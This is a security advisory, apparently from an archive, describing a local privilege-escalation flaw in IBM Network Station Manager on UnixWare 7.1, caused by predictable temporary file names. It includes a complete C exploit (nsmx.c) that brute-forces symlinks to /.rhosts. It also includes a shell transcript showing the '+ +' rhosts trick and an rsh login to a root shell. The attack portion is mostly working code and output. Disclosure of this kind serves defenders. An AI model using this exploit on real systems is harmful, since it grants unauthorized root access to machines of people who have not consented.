COMMAND
IBM NetStation Manager
SYSTEMS AFFECTED
IBM NetStation/UnixWare
PROBLEM
Brock Tellier found a vulnerability in IBM's Network Station
Manager that will allow any local user to gain root privileges.
Though he only tested NetStation on UnixWare 7.1, one would
imagine that this vulnerability is present on most NetStation
implementations. This daemon is installed/running as root by
default.
From the help html:
The IBM Network Station Manager is a browser-based tool for
centrally administering IBM Network Stations and their users.
Using the IBM Network Station Manager, the administrator can
set IBM Network Station settings on a server wide basis or an
individual user or workstation basis. Settings are
specifications defining hardware (keyboards, mouse speeds and
so on) and software as it applies to your session.
More or less, it's an http gui for managing your desktop
configuration. A vulnerability exists in the way NetStation
creates temporary files. Instead of using the secure-ish mktemp,
NetStation merely appends the current time in seconds to a known
file name. Normally, tmp races aren't a big deal for http
daemons since they run as nobody or similar, but NetStation must
run as root to be able to open/modify files as a specific user.
Thus, we can brute force a symlink from xnec.nsu.<time> to
/.rhosts and gain root.
bash-2.02$ ls /usr/netstation/nsm/users/xnec
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file
or directory
<now we go to http://localhost:880, login and click on>
<Hardware -> Workstation>
bash-2.02$ ls /usr/netstation/nsm/users/xnec
xnec.nsu xnec.usr
bash-2.02$ cc -o nsmx nsmx.c
bash-2.02$ ./nsmx
<click on Workstation again>
bash-2.02$ ls -la /.rhosts
-rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts
bash-2.02$ echo "+ +" > /.rhosts
bash-2.02$ chown root /.rhosts
bash-2.02$ rsh -l root localhost sh -i
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
#
/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
*
* Exploits a temporary file race condition in NetStation's HTTP interface
*
* To exploit: first, change the paths below to reflect your individual
* settings/paths. Don't worry if <username>.nsu doesn't exist, NS will
* create it for you. Next, point your browser at
* http://localhost:880 and login as a normal user. Click on "Hardware"
* Then "workstation". This will create <netstationdir>/users/xnec.
* Next, compile and run this program. You only have thirty seconds from
* the time you complete this step to then click on "Workstation". When
* this is done, you should have an /.rhosts which you own. On some
* UnixWare systems, you may need to chown root /.rhosts in order to do
* rsh -l root localhost sh -i.
*
* Brock Tellier btellier@usa.net
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
void main() {
/* Change these paths */
char dest[20] = "/.rhosts";
char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
long sec;
int i;
sec = time(0);
for (i = 0; i < 30; i++) {
sprintf(sourcesym, "%s%d", source, (sec + i));
symlink(dest,sourcesym);
}
}
SOLUTION
Nothing yet.